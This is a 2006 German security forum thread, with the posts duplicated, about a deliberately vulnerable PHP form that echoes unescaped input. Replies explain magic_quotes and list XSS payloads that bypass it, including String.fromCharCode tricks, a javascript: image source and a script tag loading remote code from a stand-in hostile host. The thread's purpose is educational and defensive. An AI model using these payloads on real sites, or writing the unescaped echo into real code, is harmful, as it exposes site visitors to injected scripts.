[HaBo]

meadow · 01.06.06, 14:00

Hiho

Ich habe mir ein kleines Script geschrieben um es zu hacken:

PHP-Code:

 
<form method="post" action="test.php?attacke=1">

<input type="text" name="test">

<input type="submit">

</form>


<?

if ($_GET['attacke'])
{

    $foo = $_POST['test'];

    echo "<br>".$foo;
}

else
{
    echo "<br>"."if negativ";
}

?>

ich habe versucht ein javascript einzuschleusen, simples <script>alert("XSS")</script>

es kommt allerdings nur folgendes in den Quellcode:

Code:

[...]
<br><script>alert(\"XSS\")</script>

das ist an und für sich auch gut so, da es sicher ist.

wie kommen diese \ überhaupt da hinein (sicherheitsfeature von php?)?

im habo wiki steht, dass es auf diese art möglich ist code zu starten. (veraltet?)

kann man mittels diesem script, irgnedwie schädlichen code einschläusen?

ich habe es zum testen hier heraufgeladen, jeder ist herzlich dazu eingeladen sich daran zu versuchen.

wäre über sicherheitstipps sehr dankbar =)

meadow

**Elderan** · 01.06.06, 17:04

Hallo,
was du meinst, nennt sich: magic_quotes_gpc, hat mit XSS aber nichts zu tun.

Eingaben die vom User stammen ($_POST, $_GET etc.) werden automatisch maskiert (sofern der Wert auf On steht) also wird " zu \".
Primär soll dies gegen SQL Injections schützen.

Wenn man bei dir z.B.:
<script>alert(666);</script>

angibt, wird der Code ausgeführt. Man darf halt keine Anführungszeichen benutzen, und sofern man nichts ausgibt, braucht man Anführungszeichen relativ selten.

Eine andere Möglichkeit wäre z.B.
<script src=http://www.666.hell/boeserCode.js></script>

Oder einfach:
<h1>Diese Website ist dooooooooof

</h1>

Anzeige

- Anzeige -

meadow · 01.06.06, 17:15

hey danke dir

werde wohl "http://" in der eingabe nicht zulassen.

was ist denn der unterschied zwischen xss und magic_qutes_gpc ?
im habo wiki, steht das als xss..

**Elderan** · 01.06.06, 18:11

Hallo,
naja das Habo Wiki ist nicht allwissend, dafür gibts aber noch das gute alte Wikipedia:
Wikipedia.de => XSS

XSS bedeutet einfach, das jmd. unerlaubt HTML (o.ä.) Code in deine Seite einschleust, so dass diese ausgegeben wird, so wie bei deinem Formular.

meadow · 01.06.06, 18:28

ich fürchte, das gute alte wikipedia und das habo-wiki sind doch allwissend:

wikipedia zitat über xss:

Zitat:

Diese Daten sind oft Code einer clientseitigen Skriptsprache, die als Parameter an eine Website übergeben werden. Wenn dieser Code dann in der vom Server zurückgesendeten Webseite wieder auftaucht, kann es dazu führen, dass der Webbrowser des Benutzers diesen Code ausführt.

**Mackz** · 02.06.06, 00:08

Zitat:

wie kommen diese \ überhaupt da hinein (sicherheitsfeature von php?)?
im habo wiki steht, dass es auf diese art möglich ist code zu starten. (veraltet?)

Das im Habo-Wiki sind ja auch nur allgemeine Beispiele. Natürlich spielt da auch die Serverkonfiguration noch eine Rolle und auch die Natur das Scriptes, die z.b. durch Vorhandensein von stripslashes() das Ganze begünstigt.

Zum Thema magic_quotes: Das wird in PHP6 abgeschafft werden. Dann ist also wieder der Coder selbst für die Sicherheit verantwortlich und kann sich nicht auf die Serverkonfiguration verlassen. Link: http://www.php.net/~derick/meeting-n...-functionality

**Elderan** · 02.06.06, 15:19

Hallo,
ob das eine gute Idee ist, dies wieder abzuschaffen. Denn sehr viele Scripts werden dann (ausversehen) sehr unsicher

Imrahil · 02.06.06, 23:23

naja, ich code grundsätzlich mit mysql_real_escape_string und addslashes.
Aber wenn du echt sicher fahren willst: ich hab mich einfach am PHPBB bedient

In der common.php sind einige der häufigsten angriffsmethoden abgedeckt.
Schau dir das einfach mal an, wenn du diese Art der Verteidigung verstehst dann kannst du diesen code auch in deine scripte einbauen (ist zwar sehr umfangreich aber dafür auch relativ sicher).
Imrahil

Chakky · 03.06.06, 15:05

Zitat:

Original von Mackz

Zitat:

wie kommen diese \ überhaupt da hinein (sicherheitsfeature von php?)?
im habo wiki steht, dass es auf diese art möglich ist code zu starten. (veraltet?)

Das im Habo-Wiki sind ja auch nur allgemeine Beispiele. Natürlich spielt da auch die Serverkonfiguration noch eine Rolle und auch die Natur das Scriptes, die z.b. durch Vorhandensein von stripslashes() das Ganze begünstigt.

Zum Thema magic_quotes: Das wird in PHP6 abgeschafft werden. Dann ist also wieder der Coder selbst für die Sicherheit verantwortlich und kann sich nicht auf die Serverkonfiguration verlassen. Link: http://www.php.net/~derick/meeting-n...-functionality

wtf magic_quotes abschaffen? wird es wenigstens ersetz?

**Mackz** · 03.06.06, 17:54

Steht doch in dem Link.
Sie empfehlen statt dessen die input_filter extension zu verwenden.

Edit:

@ Meadow:
Ich hatte gerade mal Langeweile ...
Ein paar Möglichkeiten in deinem Beispiel Code trotz magic_quotes auszuführen wären zum Beispiel (getestet in Opera und IE):

Code:

<script>alert(String.fromCharCode(88,83,83))//></script>

oder

Code:

<img src=javascript:alert(&quot;XSS&quot;) />

oder einfach

Code:

<script src=http://localhost/xss.js></script>

mauralix · 04.08.06, 13:02

Eine Möglichkeit wäre es auch ungewollte Zeichen mittels Regulärer-Ausdrücke wegzufiltern.

Anzeige

- Anzeige -

01.06.06, 14:00	#1 (permalink)
meadow Registriert seit: 26.11.05 Likes: 0	Cross Site Scripting - PHP intelligenter geworden? Anzeige Hiho Ich habe mir ein kleines Script geschrieben um es zu hacken: PHP-Code: `<form method="post" action="test.php?attacke=1"> <input type="text" name="test"> <input type="submit"> </form> <? if ($_GET['attacke']) { $foo = $_POST['test']; echo "<br>".$foo; } else { echo "<br>"."if negativ"; } ?>` ich habe versucht ein javascript einzuschleusen, simples <script>alert("XSS")</script> es kommt allerdings nur folgendes in den Quellcode: Code: [...] <br><script>alert(\"XSS\")</script> das ist an und für sich auch gut so, da es sicher ist. wie kommen diese \ überhaupt da hinein (sicherheitsfeature von php?)? im habo wiki steht, dass es auf diese art möglich ist code zu starten. (veraltet?) kann man mittels diesem script, irgnedwie schädlichen code einschläusen? ich habe es zum testen hier heraufgeladen, jeder ist herzlich dazu eingeladen sich daran zu versuchen. wäre über sicherheitstipps sehr dankbar =) meadow

03.06.06, 17:54	#10 (permalink)
Mackz Administrator Registriert seit: 02.10.01 Likes: 30	Steht doch in dem Link. Sie empfehlen statt dessen die input_filter extension zu verwenden. Edit: @ Meadow: Ich hatte gerade mal Langeweile ... Ein paar Möglichkeiten in deinem Beispiel Code trotz magic_quotes auszuführen wären zum Beispiel (getestet in Opera und IE): Code: <script>alert(String.fromCharCode(88,83,83))//></script> oder Code: <img src=javascript:alert("XSS") /> oder einfach Code: <script src=http://localhost/xss.js></script> __________________ RL sux big time... auch 2012! Deleting pr0n is like killing your best friend [HaBo] bei Facebook - Werde Fan

04.08.06, 13:02	#11 (permalink)
mauralix Registriert seit: 17.04.06 Likes: 3	Eine Möglichkeit wäre es auch ungewollte Zeichen mittels Regulärer-Ausdrücke wegzufiltern. __________________ http://chm0815.blogspot.com

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Mein Intelligenter Brute-Forcer	AceKiller73	Code Kitchen	12	05.10.08 11:39
Alex de Vries: Cross Site-Scripting ermöglichte Zugang zu Hotmail-Accounts	NeonZero	News & Ankündigungen	0	08.06.05 10:45
WoltLab Burning Board Lite - Cross-Site Scripting	magic	News & Ankündigungen	0	13.01.05 21:38
Google uneffektiv geworden!?	Vollkorn	Off topic-Zone	17	22.02.04 19:53

01.06.06, 17:04	#2 (permalink)
Elderan Moderator Registriert seit: 30.03.04 Likes: 14	Hallo, was du meinst, nennt sich: magic_quotes_gpc, hat mit XSS aber nichts zu tun. Eingaben die vom User stammen ($_POST, $_GET etc.) werden automatisch maskiert (sofern der Wert auf On steht) also wird " zu \". Primär soll dies gegen SQL Injections schützen. Wenn man bei dir z.B.: <script>alert(666);</script> angibt, wird der Code ausgeführt. Man darf halt keine Anführungszeichen benutzen, und sofern man nichts ausgibt, braucht man Anführungszeichen relativ selten. Eine andere Möglichkeit wäre z.B. <script src=http://www.666.hell/boeserCode.js></script> Oder einfach: <h1>Diese Website ist dooooooooof </h1>

01.06.06, 17:15	#3 (permalink)
meadow Themenstarter Registriert seit: 26.11.05 Likes: 0	hey danke dir werde wohl "http://" in der eingabe nicht zulassen. was ist denn der unterschied zwischen xss und magic_qutes_gpc ? im habo wiki, steht das als xss..

01.06.06, 18:11	#4 (permalink)
Elderan Moderator Registriert seit: 30.03.04 Likes: 14	Hallo, naja das Habo Wiki ist nicht allwissend, dafür gibts aber noch das gute alte Wikipedia: Wikipedia.de => XSS XSS bedeutet einfach, das jmd. unerlaubt HTML (o.ä.) Code in deine Seite einschleust, so dass diese ausgegeben wird, so wie bei deinem Formular.

02.06.06, 15:19	#7 (permalink)
Elderan Moderator Registriert seit: 30.03.04 Likes: 14	Hallo, ob das eine gute Idee ist, dies wieder abzuschaffen. Denn sehr viele Scripts werden dann (ausversehen) sehr unsicher

02.06.06, 23:23	#8 (permalink)
Imrahil Registriert seit: 09.01.05 Likes: 0	naja, ich code grundsätzlich mit mysql_real_escape_string und addslashes. Aber wenn du echt sicher fahren willst: ich hab mich einfach am PHPBB bedient In der common.php sind einige der häufigsten angriffsmethoden abgedeckt. Schau dir das einfach mal an, wenn du diese Art der Verteidigung verstehst dann kannst du diesen code auch in deine scripte einbauen (ist zwar sehr umfangreich aber dafür auch relativ sicher). Imrahil

[HaBo]

Cross Site Scripting - PHP intelligenter geworden?